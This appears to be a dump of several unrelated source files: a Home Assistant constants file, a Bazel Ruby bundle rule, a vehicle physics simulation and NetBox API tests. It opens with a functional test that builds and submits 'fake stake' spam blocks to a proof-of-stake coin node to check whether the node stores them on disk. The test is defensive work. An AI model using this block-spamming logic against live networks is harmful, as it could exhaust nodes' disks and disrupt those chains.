self.test_nodes[i].peer_connect('127.0.0.1', p2p_port(i))
network_thread_start() # Start up network handling in another thread
self.node = self.nodes[0]
# Let the test nodes get in sync
for i in range(self.num_nodes):
self.test_nodes[i].wait_for_verack()
def run_test(self):
''' Performs the attack of this test - run init_test first.
:param:
:return:
'''
self.description = ""
self.init_test()
return
def create_spam_block(self, hashPrevBlock, stakingPrevOuts, height, fStakeDoubleSpent=False, fZPoS=False, spendingPrevOuts={}):
''' creates a block to spam the network with
:param hashPrevBlock: (hex string) hash of previous block
stakingPrevOuts: ({COutPoint --> (int, int, int, str)} dictionary)
map outpoints (to be used as staking inputs) to amount, block_time, nStakeModifier, hashStake
height: (int) block height
fStakeDoubleSpent: (bool) spend the coinstake input inside the block
fZPoS: (bool) stake the block with zerocoin
spendingPrevOuts: ({COutPoint --> (int, int, int, str)} dictionary)
map outpoints (to be used as tx inputs) to amount, block_time, nStakeModifier, hashStake
:return block: (CBlock) generated block
'''
self.log.info("Creating Spam Block")
# If not given inputs to create spam txes, use a copy of the staking inputs
if len(spendingPrevOuts) == 0:
spendingPrevOuts = dict(stakingPrevOuts)
# Get current time
current_time = int(time.time())
nTime = current_time & 0xfffffff0
# Create coinbase TX
# Even if PoS blocks have empty coinbase vout, the height is required for the vin script
coinbase = create_coinbase(height)
coinbase.vout[0].nValue = 0
coinbase.vout[0].scriptPubKey = b""
coinbase.nTime = nTime
coinbase.rehash()
# Create Block with coinbase
block = create_block(int(hashPrevBlock, 16), coinbase, nTime)
# Find valid kernel hash - Create a new private key used for block signing.
if not block.solve_stake(stakingPrevOuts):
raise Exception("Not able to solve for any prev_outpoint")
self.log.info("Stake found. Signing block...")
# Sign coinstake TX and add it to the block
signed_stake_tx = self.sign_stake_tx(block, stakingPrevOuts[block.prevoutStake][0], fZPoS)
block.vtx.append(signed_stake_tx)
# Remove coinstake input prevout unless we want to try double spending in the same block.
# Skip for zPoS as the spendingPrevouts are just regular UTXOs
if not fZPoS and not fStakeDoubleSpent:
del spendingPrevOuts[block.prevoutStake]
# remove a random prevout from the list
# (to randomize block creation if the same height is picked two times)
del spendingPrevOuts[choice(list(spendingPrevOuts))]
# Create spam for the block. Sign the spendingPrevouts
self.log.info("Creating spam TXes...")
for outPoint in spendingPrevOuts:
value_out = int(spendingPrevOuts[outPoint][0] - self.DEFAULT_FEE * COIN)
tx = create_transaction(outPoint, b"", value_out, nTime, scriptPubKey=CScript([self.block_sig_key.get_pubkey(), OP_CHECKSIG]))
# sign txes
signed_tx_hex = self.node.signrawtransaction(bytes_to_hex_str(tx.serialize()))['hex']
signed_tx = CTransaction()
signed_tx.deserialize(BytesIO(hex_str_to_bytes(signed_tx_hex)))
block.vtx.append(signed_tx)
# Get correct MerkleRoot and rehash block
block.hashMerkleRoot = block.calc_merkle_root()
block.rehash()
# Sign block with coinstake key and return it
block.sign_block(self.block_sig_key)
return block
def spend_utxo(self, utxo, address_list):
''' spend amount from previously unspent output to a provided address
:param utxo: (JSON) returned from listunspent used as input
addresslist: (string) destination address
:return: txhash: (string) tx hash if successful, empty string otherwise
'''
try:
inputs = [{"txid":utxo["txid"], "vout":utxo["vout"]}]
out_amount = (float(utxo["amount"]) - self.DEFAULT_FEE)/len(address_list)
outputs = {}
for address in address_list:
outputs[address] = out_amount
spendingTx = self.node.createrawtransaction(inputs, outputs)
spendingTx_signed = self.node.signrawtransaction(spendingTx)
if spendingTx_signed["complete"]:
txhash = self.node.sendrawtransaction(spendingTx_signed["hex"])
return txhash
else:
self.log.warning("Error: %s" % str(spendingTx_signed["errors"]))
return ""
except JSONRPCException as e:
self.log.error("JSONRPCException: %s" % str(e))
return ""
def spend_utxos(self, utxo_list, address_list = []):
''' spend utxos to provided list of addresses or 10 new generate ones.
:param utxo_list: (JSON list) returned from listunspent used as input
address_list: (string list) [optional] recipient StreamitCoin addresses. if not set,
10 new addresses will be generated from the wallet for each tx.
:return: txHashes (string list) tx hashes
'''
txHashes = []
# If not given, get 10 new addresses from self.node wallet
if address_list == []:
for i in range(10):
address_list.append(self.node.getnewaddress())
for utxo in utxo_list:
try:
# spend current utxo to provided addresses
txHash = self.spend_utxo(utxo, address_list)
if txHash != "":
txHashes.append(txHash)
except JSONRPCException as e:
self.log.error("JSONRPCException: %s" % str(e))
continue
return txHashes
def stake_amplification_step(self, utxo_list, address_list = []):
''' spends a list of utxos providing the list of new outputs
:param utxo_list: (JSON list) returned from listunspent used as input
address_list: (string list) [optional] recipient StreamitCoin addresses.
:return: new_utxos: (JSON list) list of new (valid) inputs after the spends
'''
self.log.info("--> Stake Amplification step started with %d UTXOs", len(utxo_list))
txHashes = self.spend_utxos(utxo_list, address_list)
num_of_txes = len(txHashes)
new_utxos = []
if num_of_txes> 0:
self.log.info("Created %d transactions...Mining 2 blocks to include them..." % num_of_txes)
self.node.generate(2)
time.sleep(2)
new_utxos = self.node.listunspent()
self.log.info("Amplification step produced %d new \"Fake Stake\" inputs:" % len(new_utxos))
return new_utxos
def stake_amplification(self, utxo_list, iterations, address_list = []):
''' performs the "stake amplification" which gives higher chances at finding fake stakes
:param utxo_list: (JSON list) returned from listunspent used as input
iterations: (int) amount of stake amplification steps to perform
address_list: (string list) [optional] recipient StreamitCoin addresses.
:return: all_inputs: (JSON list) list of all spent inputs
'''
self.log.info("** Stake Amplification started with %d UTXOs", len(utxo_list))
valid_inputs = utxo_list
all_inputs = []
for i in range(iterations):
all_inputs = all_inputs + valid_inputs
old_inputs = valid_inputs
valid_inputs = self.stake_amplification_step(old_inputs, address_list)
self.log.info("** Stake Amplification ended with %d \"fake\" UTXOs", len(all_inputs))
return all_inputs
def sign_stake_tx(self, block, stake_in_value, fZPoS=False):
''' signs a coinstake transaction
:param block: (CBlock) block with stake to sign
stake_in_value: (int) staked amount
fZPoS: (bool) zerocoin stake
:return: stake_tx_signed: (CTransaction) signed tx
'''
self.block_sig_key = CECKey()
if fZPoS:
self.log.info("Signing zPoS stake...")
# Create raw zerocoin stake TX (signed)
raw_stake = self.node.createrawzerocoinstake(block.prevoutStake)
stake_tx_signed_raw_hex = raw_stake["hex"]
# Get stake TX private key to sign the block with
stake_pkey = raw_stake["private-key"]
self.block_sig_key.set_compressed(True)
self.block_sig_key.set_secretbytes(bytes.fromhex(stake_pkey))
else:
# Create a new private key and get the corresponding public key
self.block_sig_key.set_secretbytes(hash256(pack('<I', 0xffff)))
pubkey = self.block_sig_key.get_pubkey()
# Create the raw stake TX (unsigned)
scriptPubKey = CScript([pubkey, OP_CHECKSIG])
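            # Output value: the staked amount plus 2 COIN (presumably the stake reward this test assumes)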
outNValue = int(stake_in_value + 2*COIN)
stake_tx_unsigned = CTransaction()
stake_tx_unsigned.nTime = block.nTime
stake_tx_unsigned.vin.append(CTxIn(block.prevoutStake))
stake_tx_unsigned.vin[0].nSequence = 0xffffffff
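            # Coinstake convention: the first output is left empty, the stake payout goes in the second output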
stake_tx_unsigned.vout.append(CTxOut())
stake_tx_unsigned.vout.append(CTxOut(outNValue, scriptPubKey))
# Sign the stake TX
stake_tx_signed_raw_hex = self.node.signrawtransaction(bytes_to_hex_str(stake_tx_unsigned.serialize()))['hex']
# Deserialize the signed raw tx into a CTransaction object and return it
stake_tx_signed = CTransaction()
stake_tx_signed.deserialize(BytesIO(hex_str_to_bytes(stake_tx_signed_raw_hex)))
return stake_tx_signed
def get_prevouts(self, utxo_list, blockHeight, zpos=False):
''' get prevouts (map) for each utxo in a list
:param utxo_list: <if zpos=False> (JSON list) utxos returned from listunspent used as input
<if zpos=True> (JSON list) mints returned from listmintedzerocoins used as input
blockHeight: (int) height of the previous block
zpos: (bool) type of utxo_list
:return: stakingPrevOuts: ({COutPoint --> (int, int, int, str)} dictionary)
map outpoints to amount, block_time, nStakeModifier, hashStake
'''
zerocoinDenomList = [1, 5, 10, 50, 100, 500, 1000, 5000]
stakingPrevOuts = {}
for utxo in utxo_list:
if zpos:
# get mint checkpoint
checkpointHeight = blockHeight - 200
checkpointBlock = self.node.getblock(self.node.getblockhash(checkpointHeight), True)
checkpoint = int(checkpointBlock['acc_checkpoint'], 16)
# parse checksum and get checksumblock
pos = zerocoinDenomList.index(utxo['denomination'])
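                # The checkpoint packs one 32-bit checksum per denomination; shift and mask to extract the word for this one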
checksum = (checkpoint >> (32 * (len(zerocoinDenomList) - 1 - pos))) & 0xFFFFFFFF
checksumBlock = self.node.getchecksumblock(hex(checksum), utxo['denomination'], True)
# get block hash and block time
txBlockhash = checksumBlock['hash']
txBlocktime = checksumBlock['time']
else:
# get raw transaction for current input
utxo_tx = self.node.getrawtransaction(utxo['txid'], 1)
# get block hash and block time
txBlocktime = utxo_tx['blocktime']
txBlockhash = utxo_tx['blockhash']
# get Stake Modifier
stakeModifier = int(self.node.getblock(txBlockhash)['modifier'], 16)
# assemble prevout object
utxo_to_stakingPrevOuts(utxo, stakingPrevOuts, txBlocktime, stakeModifier, zpos)
return stakingPrevOuts
def log_data_dir_size(self):
''' Prints the size of the '/regtest/blocks' directory.
:param:
:return:
'''
init_size = dir_size(self.node.datadir + "/regtest/blocks")
self.log.info("Size of data dir: %s kilobytes" % str(init_size))
def test_spam(self, name, staking_utxo_list,
fRandomHeight=False, randomRange=0, randomRange2=0,
fDoubleSpend=False, fMustPass=False, fZPoS=False,
spending_utxo_list=[]):
''' General method to create, send and test the spam blocks
:param name: (string) chain branch (usually either "Main" or "Forked")
staking_utxo_list: (string list) utxos to use for staking
fRandomHeight: (bool) send blocks at random height
randomRange: (int) if fRandomHeight=True, height is >= current-randomRange
               randomRange2: (int) if fRandomHeight=True, height is <= current-randomRange2
fDoubleSpend: (bool) if true, stake input is double spent in block.vtx
fMustPass: (bool) if true, the blocks must be stored on disk
fZPoS: (bool) stake the block with zerocoin
spending_utxo_list: (string list) utxos to use for spending
:return: err_msgs: (string list) reports error messages from the test
or an empty list if test is successful
'''
# Create empty error messages list
err_msgs = []
# Log initial datadir size
self.log_data_dir_size()
# Get latest block number and hash
block_count = self.node.getblockcount()
pastBlockHash = self.node.getblockhash(block_count)
randomCount = block_count
self.log.info("Current height: %d" % block_count)
for i in range(0, self.NUM_BLOCKS):
            if i != 0:
self.log.info("Sent %d blocks out of %d" % (i, self.NUM_BLOCKS))
# if fRandomHeight=True get a random block number (in range) and corresponding hash
if fRandomHeight:
randomCount = randint(block_count - randomRange, block_count - randomRange2)
pastBlockHash = self.node.getblockhash(randomCount)
# Get spending prevouts and staking prevouts for the height of current block
current_block_n = randomCount + 1
stakingPrevOuts = self.get_prevouts(staking_utxo_list, randomCount, zpos=fZPoS)
spendingPrevOuts = self.get_prevouts(spending_utxo_list, randomCount)
# Create the spam block
block = self.create_spam_block(pastBlockHash, stakingPrevOuts, current_block_n,
fStakeDoubleSpent=fDoubleSpend, fZPoS=fZPoS, spendingPrevOuts=spendingPrevOuts)
# Log time and size of the block
block_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(block.nTime))
block_size = len(block.serialize())/1000
self.log.info("Sending block %d [%s...] - nTime: %s - Size (kb): %.2f",
current_block_n, block.hash[:7], block_time, block_size)
# Try submitblock
var = self.node.submitblock(bytes_to_hex_str(block.serialize()))
time.sleep(1)
if (not fMustPass and var not in [None, "bad-txns-invalid-zpiv"]) or (fMustPass and var != "inconclusive"):
self.log.error("submitblock [fMustPass=%s] result: %s" % (str(fMustPass), str(var)))
err_msgs.append("submitblock %d: %s" % (current_block_n, str(var)))
# Try sending the message block
msg = msg_block(block)
try:
self.test_nodes[0].handle_connect()
self.test_nodes[0].send_message(msg)
time.sleep(2)
block_ret = self.node.getblock(block.hash)
if not fMustPass and block_ret is not None:
self.log.error("Error, block stored in %s chain" % name)
err_msgs.append("getblock %d: result not None" % current_block_n)
if fMustPass:
if block_ret is None:
self.log.error("Error, block NOT stored in %s chain" % name)
err_msgs.append("getblock %d: result is None" % current_block_n)
else:
self.log.info("Good. Block IS stored on disk.")
except JSONRPCException as e:
exc_msg = str(e)
if exc_msg == "Can't read block from disk (-32603)":
if fMustPass:
self.log.warning("Bad! Block was NOT stored to disk.")
err_msgs.append(exc_msg)
else:
self.log.info("Good. Block was not stored on disk.")
else:
self.log.warning(exc_msg)
err_msgs.append(exc_msg)
except Exception as e:
exc_msg = str(e)
self.log.error(exc_msg)
err_msgs.append(exc_msg)
self.log.info("Sent all %s blocks." % str(self.NUM_BLOCKS))
# Log final datadir size
self.log_data_dir_size()
# Return errors list
return err_msgs
|
py | 1a40b8430d7f890e125bf2ec6a0e4dabff9d199b | """Constants for the Vilfo Router integration."""
from homeassistant.const import DEVICE_CLASS_TIMESTAMP
DOMAIN = "vilfo"
ATTR_API_DATA_FIELD = "api_data_field"
ATTR_API_DATA_FIELD_LOAD = "load"
ATTR_API_DATA_FIELD_BOOT_TIME = "boot_time"
ATTR_DEVICE_CLASS = "device_class"
ATTR_ICON = "icon"
ATTR_LABEL = "label"
ATTR_LOAD = "load"
ATTR_UNIT = "unit"
ATTR_BOOT_TIME = "boot_time"
ROUTER_DEFAULT_HOST = "admin.vilfo.com"
ROUTER_DEFAULT_MODEL = "Vilfo Router"
ROUTER_DEFAULT_NAME = "Vilfo Router"
ROUTER_MANUFACTURER = "Vilfo AB"
UNIT_PERCENT = "%"
SENSOR_TYPES = {
ATTR_LOAD: {
ATTR_LABEL: "Load",
ATTR_UNIT: UNIT_PERCENT,
ATTR_ICON: "mdi:memory",
ATTR_API_DATA_FIELD: ATTR_API_DATA_FIELD_LOAD,
},
ATTR_BOOT_TIME: {
ATTR_LABEL: "Boot time",
ATTR_ICON: "mdi:timer",
ATTR_API_DATA_FIELD: ATTR_API_DATA_FIELD_BOOT_TIME,
ATTR_DEVICE_CLASS: DEVICE_CLASS_TIMESTAMP,
},
}
|
bzl | 1a40b8dbfd7de14f784b735de1717a0a3ee1f88e | load("//ruby/private:constants.bzl", "RULES_RUBY_WORKSPACE_NAME")
load("//ruby/private:providers.bzl", "RubyRuntimeContext")
DEFAULT_BUNDLER_VERSION = "2.1.2"
BUNDLE_BIN_PATH = "bin"
BUNDLE_PATH = "lib"
SCRIPT_INSTALL_BUNDLER = "download_bundler.rb"
SCRIPT_ACTIVATE_GEMS = "activate_gems.rb"
SCRIPT_BUILD_FILE_GENERATOR = "create_bundle_build_file.rb"
# Runs bundler with arbitrary arguments
# eg: run_bundler(runtime_ctx, [ "lock", " --gemfile", "Gemfile.rails5" ])
def run_bundler(runtime_ctx, bundler_arguments):
# Now we are running bundle install
args = [
runtime_ctx.interpreter, # ruby
"-I",
".",
"-I", # Used to tell Ruby where to load the library scripts
BUNDLE_PATH, # Add vendor/bundle to the list of resolvers
"bundler/gems/bundler-{}/exe/bundle".format(runtime_ctx.bundler_version), # our binary
] + bundler_arguments
kwargs = {}
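    # BUNDLER_TIMEOUT (whole seconds) optionally caps how long the bundler command may run, e.g. BUNDLER_TIMEOUT=600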
if "BUNDLER_TIMEOUT" in runtime_ctx.ctx.os.environ:
timeout_in_secs = runtime_ctx.ctx.os.environ["BUNDLER_TIMEOUT"]
if timeout_in_secs.isdigit():
kwargs["timeout"] = int(timeout_in_secs)
else:
fail("'%s' is invalid value for BUNDLER_TIMEOUT. Must be an integer." % (timeout_in_secs))
return runtime_ctx.ctx.execute(
args,
quiet = False,
        # Need to run this command with GEM_HOME set so that the bin stubs can load the correct bundler
environment = {"GEM_HOME": "bundler", "GEM_PATH": "bundler"},
**kwargs
)
def install_bundler(runtime_ctx):
args = [
runtime_ctx.interpreter,
SCRIPT_INSTALL_BUNDLER,
runtime_ctx.bundler_version,
]
result = runtime_ctx.ctx.execute(args, environment = runtime_ctx.environment, quiet = False)
if result.return_code:
fail("Error installing bundler: {} {}".format(result.stdout, result.stderr))
def bundle_install(runtime_ctx):
bundler_args = [
"install", # bundle install
"--standalone", # Makes a bundle that can work without depending on Rubygems or Bundler at runtime.
"--binstubs={}".format(BUNDLE_BIN_PATH), # Creates a directory and place any executables from the gem there.
"--path={}".format(BUNDLE_PATH), # The location to install the specified gems to.
"--jobs=10", # run a few jobs to ensure no gem install is blocking another
]
if runtime_ctx.ctx.attr.full_index:
bundler_args.append("--full-index")
result = run_bundler(runtime_ctx, bundler_args)
if result.return_code:
fail("bundle install failed: %s%s" % (result.stdout, result.stderr))
def generate_bundle_build_file(runtime_ctx):
# Create the BUILD file to expose the gems to the WORKSPACE
# USAGE: ./create_bundle_build_file.rb BUILD.bazel Gemfile.lock repo-name [excludes-json] workspace-name
args = [
runtime_ctx.interpreter, # ruby interpreter
SCRIPT_BUILD_FILE_GENERATOR, # The template used to created bundle file
"BUILD.bazel", # Bazel build file (can be empty)
"Gemfile.lock", # Gemfile.lock where we list all direct and transitive dependencies
runtime_ctx.ctx.name, # Name of the target
repr(runtime_ctx.ctx.attr.excludes),
RULES_RUBY_WORKSPACE_NAME,
runtime_ctx.bundler_version,
]
result = runtime_ctx.ctx.execute(
args,
# The build file generation script requires bundler so we add this to make
# the correct version of bundler available
environment = {"GEM_HOME": "bundler", "GEM_PATH": "bundler"},
quiet = False,
)
if result.return_code:
fail("build file generation failed: %s%s" % (result.stdout, result.stderr))
def _rb_bundle_impl(ctx):
ctx.symlink(ctx.attr.gemfile, "Gemfile")
ctx.symlink(ctx.attr.gemfile_lock, "Gemfile.lock")
ctx.symlink(ctx.attr._create_bundle_build_file, SCRIPT_BUILD_FILE_GENERATOR)
ctx.symlink(ctx.attr._install_bundler, SCRIPT_INSTALL_BUNDLER)
ctx.symlink(ctx.attr._activate_gems, SCRIPT_ACTIVATE_GEMS)
# Setup this provider that we pass around between functions for convenience
runtime_ctx = RubyRuntimeContext(
ctx = ctx,
interpreter = ctx.path(ctx.attr.ruby_interpreter),
environment = {"RUBYOPT": "--enable-gems"},
bundler_version = ctx.attr.bundler_version,
)
# 1. Install the right version of the Bundler Gem
install_bundler(runtime_ctx)
# Create label for the Bundler executable
bundler = Label("//:bundler/gems/bundler-{}/exe/bundle".format(runtime_ctx.bundler_version))
# Run bundle install
bundle_install(runtime_ctx)
# Generate the BUILD file for the bundle
generate_bundle_build_file(runtime_ctx)
rb_bundle = repository_rule(
implementation = _rb_bundle_impl,
attrs = {
"ruby_sdk": attr.string(
default = "@org_ruby_lang_ruby_toolchain",
),
"ruby_interpreter": attr.label(
default = "@org_ruby_lang_ruby_toolchain//:ruby",
),
"gemfile": attr.label(
allow_single_file = True,
mandatory = True,
),
"gemfile_lock": attr.label(
allow_single_file = True,
),
"version": attr.string(
mandatory = False,
),
"bundler_version": attr.string(
default = DEFAULT_BUNDLER_VERSION,
),
"excludes": attr.string_list_dict(
doc = "List of glob patterns per gem to be excluded from the library",
),
"full_index": attr.bool(
default = False,
doc = "Use --full-index for bundle install",
),
"_install_bundler": attr.label(
default = "%s//ruby/private/bundle:%s" % (
RULES_RUBY_WORKSPACE_NAME,
SCRIPT_INSTALL_BUNDLER,
),
allow_single_file = True,
),
"_create_bundle_build_file": attr.label(
default = "%s//ruby/private/bundle:%s" % (
RULES_RUBY_WORKSPACE_NAME,
SCRIPT_BUILD_FILE_GENERATOR,
),
doc = "Creates the BUILD file",
allow_single_file = True,
),
"_activate_gems": attr.label(
default = "%s//ruby/private/bundle:%s" % (
RULES_RUBY_WORKSPACE_NAME,
SCRIPT_ACTIVATE_GEMS,
),
allow_single_file = True,
),
},
)
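# Illustrative WORKSPACE usage (label names below are placeholders, not taken from this repo):
#   rb_bundle(
#       name = "bundle",
#       gemfile = "//:Gemfile",
#       gemfile_lock = "//:Gemfile.lock",
#   )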
|
py | 1a40b90e3eaf7cc7d1347c18e2a3f12bbe640f7d | #!/usr/bin/env python
# Direct downwind faster than the wind vehicle simulation
#
import os
from math import pi
import numpy as np
from matplotlib import pyplot as plt
from airfoil import Airfoil
from blade import Blade
from rotor import Rotor
from vehicle import Vehicle
from rk4 import RK4
ddwfttw_vehicle = None
Vwind = None
rho = None
g = None
v_schedule = None
collective_schedule = None
# Equation of motion
# Inputs:
# t: time
# x: np.array([position, velocity])
# (global) ddwfttw_vehicle
# (global) Vwind
# (global) rho: air density
# (global) g: acceleration due to gravity
# (global) v_schedule: vehicle speeds for interpolating collective
# (global) collective_schedule: collective pitch at the speeds in v_schedule
# Returns:
# xdot: np.array([velocity, acceleration])
def motion(t, x):
global ddwfttw_vehicle
global Vwind
global rho
global g
global v_schedule
global collective_schedule
# Set vehicle velocity
ddwfttw_vehicle.setSpeed(x[1])
# Get collective pitch from schedule
theta0 = np.interp(x[1], v_schedule, collective_schedule)
forces = ddwfttw_vehicle.computeForces(Vwind, rho, theta0, g)
f = sum(forces.values())
# Equations of motion
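    # State is x = [position, velocity]; its derivative is [velocity, net force / mass]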
xdot = np.zeros((2))
xdot[0] = x[1]
xdot[1] = f/ddwfttw_vehicle._m
return xdot
if __name__ == "__main__":
# Conversion factors
lbm2slug = 1./32.174
mph2fps = 5280./3600.
kg2slug = 0.06852177
m2in = 1./0.0254
in2ft = 1./12.
# Vehicle parameters:
# wheel_radius: wheel radius (ft)
# gear_ratio: ratio of wheel rpm to prop rpm
# gear_efficiency: transmission efficiency
# CDf: drag coefficient for air flowing over the vehicle from front to back
# CDb: drag coefficient for air flowing over the vehicle from back to front
# Crr: coefficient of rolling resistance
# A: projected frontal area (sq ft)
# m: total vehicle mass (slug)
wheel_radius = 1.25
gear_ratio = 1.5
gear_efficiency = 0.85
CDf = 0.3
CDb = 0.4
Crr = 0.01
A = 20.
m = 650.*lbm2slug
# Wind speed (ft/sec) (positive tailwind)
Vwind = 10.*mph2fps
# Air density (slug/ft^3)
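    # (sea-level 1.225 kg/m^3 converts to roughly 0.00238 slug/ft^3)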
rho = 1.225*kg2slug/(m2in**3)/(in2ft**3)
# Acceleration due to gravity
g = 32.174
# NACA 0012 airfoil
airfoil = Airfoil()
airfoil.readClCdTables(os.path.join("airfoil_tables","naca6412.cltable"),
os.path.join("airfoil_tables","naca6412.cdtable"))
# Rotor blade parameters
radial = [1., 2.5, 3.5, 8.75] # Radial stations (ft)
chord = [0.2, 1.1, 1.2, 0.3] # Chord (ft)
twist = [26., 18., 16., 8.0] # Twist (deg)
blade = Blade(radial, chord, twist, airfoil)
blade.plotChord()
blade.plotTwist()
# Rotor
rotor = Rotor(blade, 2)
rotor.discretize(100)
# collective schedule based on vehicle speed
v_schedule = np.array([0.5, 0.8, 1.0, 1.5, 2.0, 2.2, 2.5, 2.6])*Vwind
collective_schedule = np.array([0., 2., 4., 6., 8., 9., 9., 9.])
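    # motion() linearly interpolates the collective pitch (deg) between these breakpoints via np.interp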
# Vehicle
ddwfttw_vehicle = Vehicle(wheel_radius, gear_ratio, gear_efficiency, CDf, CDb, Crr, A, m,
rotor)
initial_speed = 0.5*Vwind # Initial condition. Start rolling at half the wind
# speed since rotor model loses accuracy below V.
# Initialize some arrays for plotting later
time = []
position = []
speed = []
theta0 = []
thrust = []
fdrag_aero = []
fdrag_rotor = []
frolling_resistance = []
# Run the DDWFTTW simulation and store some things to plot later
maxsteps = 400
dt = 0.5
initial_condition = np.array([0.0, initial_speed])
integrator = RK4(motion, 0.0, initial_condition, dt)
for i in range(maxsteps):
integrator.step()
time.append(integrator.t)
position.append(integrator.y[0])
speed.append(integrator.y[1]/mph2fps)
theta0.append(np.interp(integrator.y[1], v_schedule, collective_schedule))
thrust.append(ddwfttw_vehicle._rotor._thrust)
fdrag_aero.append(ddwfttw_vehicle._Fdrag_aero)
fdrag_rotor.append(ddwfttw_vehicle._Fdrag_rotor)
frolling_resistance.append(ddwfttw_vehicle._Frr)
print("Time step {:d}, time = {:.1f}, speed = {:.2f} mph"\
.format(i+1, integrator.t, integrator.y[1]/mph2fps))
# Kick out early if net force becomes <= 0. That means we can't go any faster.
net = thrust[i] + fdrag_aero[i] + fdrag_rotor[i] + frolling_resistance[i]
if net <= 0.:
print("Max speed reached!")
break
# Plot
fig, ax = plt.subplots(figsize=(10,6))
ax.set_xlabel("Time (sec)")
ax.set_ylabel("Position (ft)")
ax.plot(time, position)
ax.grid()
fig.savefig("position.png", bbox_inches="tight")
plt.clf()
plt.close()
fig, ax = plt.subplots(figsize=(10,6))
ax.set_xlabel("Time (sec)")
ax.set_ylabel("Speed (mph)")
ax.plot([time[0], time[-1]], [Vwind/mph2fps, Vwind/mph2fps])
ax.plot(time, speed)
ax.grid()
ax.legend(["Wind", "Vehicle"])
fig.savefig("speed.png", bbox_inches="tight")
plt.clf()
plt.close()
fig, ax = plt.subplots(figsize=(10,6))
ax.set_xlabel("Time (sec)")
ax.set_ylabel("Collective pitch (deg)")
ax.plot(time, theta0)
ax.grid()
fig.savefig("collective.png", bbox_inches="tight")
plt.clf()
plt.close()
fig, ax = plt.subplots(figsize=(10,6))
ax.set_xlabel("Time (sec)")
ax.set_ylabel("Vehicle forces (lbf)")
ax.plot(time, thrust)
ax.plot(time, fdrag_aero)
ax.plot(time, fdrag_rotor)
ax.plot(time, frolling_resistance)
ax.grid()
ax.legend(["Rotor thrust", "Frame drag", "Drag to spin rotor", "Rolling resistance"])
fig.savefig("forces.png", bbox_inches="tight")
|
py | 1a40b95a5f98de9885c3d34048e8e7513077ca68 | from __future__ import unicode_literals
from netaddr import IPNetwork
from rest_framework import status
from rest_framework.test import APITestCase
from django.contrib.auth.models import User
from django.urls import reverse
from dcim.models import Device, DeviceRole, DeviceType, Manufacturer, Site
from ipam.models import (
Aggregate, IPAddress, IP_PROTOCOL_TCP, IP_PROTOCOL_UDP, Prefix, RIR, Role, Service, VLAN, VLANGroup, VRF,
)
from users.models import Token
from utilities.tests import HttpStatusMixin
class VRFTest(HttpStatusMixin, APITestCase):
def setUp(self):
user = User.objects.create(username='testuser', is_superuser=True)
token = Token.objects.create(user=user)
self.header = {'HTTP_AUTHORIZATION': 'Token {}'.format(token.key)}
self.vrf1 = VRF.objects.create(name='Test VRF 1', rd='65000:1')
self.vrf2 = VRF.objects.create(name='Test VRF 2', rd='65000:2')
self.vrf3 = VRF.objects.create(name='Test VRF 3', rd='65000:3')
def test_get_vrf(self):
url = reverse('ipam-api:vrf-detail', kwargs={'pk': self.vrf1.pk})
response = self.client.get(url, **self.header)
self.assertEqual(response.data['name'], self.vrf1.name)
def test_list_vrfs(self):
url = reverse('ipam-api:vrf-list')
response = self.client.get(url, **self.header)
self.assertEqual(response.data['count'], 3)
def test_create_vrf(self):
data = {
'name': 'Test VRF 4',
'rd': '65000:4',
}
url = reverse('ipam-api:vrf-list')
response = self.client.post(url, data, **self.header)
self.assertHttpStatus(response, status.HTTP_201_CREATED)
self.assertEqual(VRF.objects.count(), 4)
vrf4 = VRF.objects.get(pk=response.data['id'])
self.assertEqual(vrf4.name, data['name'])
self.assertEqual(vrf4.rd, data['rd'])
def test_update_vrf(self):
data = {
'name': 'Test VRF X',
'rd': '65000:99',
}
url = reverse('ipam-api:vrf-detail', kwargs={'pk': self.vrf1.pk})
response = self.client.put(url, data, **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
self.assertEqual(VRF.objects.count(), 3)
vrf1 = VRF.objects.get(pk=response.data['id'])
self.assertEqual(vrf1.name, data['name'])
self.assertEqual(vrf1.rd, data['rd'])
def test_delete_vrf(self):
url = reverse('ipam-api:vrf-detail', kwargs={'pk': self.vrf1.pk})
response = self.client.delete(url, **self.header)
self.assertHttpStatus(response, status.HTTP_204_NO_CONTENT)
self.assertEqual(VRF.objects.count(), 2)
class RIRTest(HttpStatusMixin, APITestCase):
def setUp(self):
user = User.objects.create(username='testuser', is_superuser=True)
token = Token.objects.create(user=user)
self.header = {'HTTP_AUTHORIZATION': 'Token {}'.format(token.key)}
self.rir1 = RIR.objects.create(name='Test RIR 1', slug='test-rir-1')
self.rir2 = RIR.objects.create(name='Test RIR 2', slug='test-rir-2')
self.rir3 = RIR.objects.create(name='Test RIR 3', slug='test-rir-3')
def test_get_rir(self):
url = reverse('ipam-api:rir-detail', kwargs={'pk': self.rir1.pk})
response = self.client.get(url, **self.header)
self.assertEqual(response.data['name'], self.rir1.name)
def test_list_rirs(self):
url = reverse('ipam-api:rir-list')
response = self.client.get(url, **self.header)
self.assertEqual(response.data['count'], 3)
def test_create_rir(self):
data = {
'name': 'Test RIR 4',
'slug': 'test-rir-4',
}
url = reverse('ipam-api:rir-list')
response = self.client.post(url, data, **self.header)
self.assertHttpStatus(response, status.HTTP_201_CREATED)
self.assertEqual(RIR.objects.count(), 4)
rir4 = RIR.objects.get(pk=response.data['id'])
self.assertEqual(rir4.name, data['name'])
self.assertEqual(rir4.slug, data['slug'])
def test_update_rir(self):
data = {
'name': 'Test RIR X',
'slug': 'test-rir-x',
}
url = reverse('ipam-api:rir-detail', kwargs={'pk': self.rir1.pk})
response = self.client.put(url, data, **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
self.assertEqual(RIR.objects.count(), 3)
rir1 = RIR.objects.get(pk=response.data['id'])
self.assertEqual(rir1.name, data['name'])
self.assertEqual(rir1.slug, data['slug'])
def test_delete_rir(self):
url = reverse('ipam-api:rir-detail', kwargs={'pk': self.rir1.pk})
response = self.client.delete(url, **self.header)
self.assertHttpStatus(response, status.HTTP_204_NO_CONTENT)
self.assertEqual(RIR.objects.count(), 2)
class AggregateTest(HttpStatusMixin, APITestCase):
def setUp(self):
user = User.objects.create(username='testuser', is_superuser=True)
token = Token.objects.create(user=user)
self.header = {'HTTP_AUTHORIZATION': 'Token {}'.format(token.key)}
self.rir1 = RIR.objects.create(name='Test RIR 1', slug='test-rir-1')
self.rir2 = RIR.objects.create(name='Test RIR 2', slug='test-rir-2')
self.aggregate1 = Aggregate.objects.create(prefix=IPNetwork('10.0.0.0/8'), rir=self.rir1)
self.aggregate2 = Aggregate.objects.create(prefix=IPNetwork('172.16.0.0/12'), rir=self.rir1)
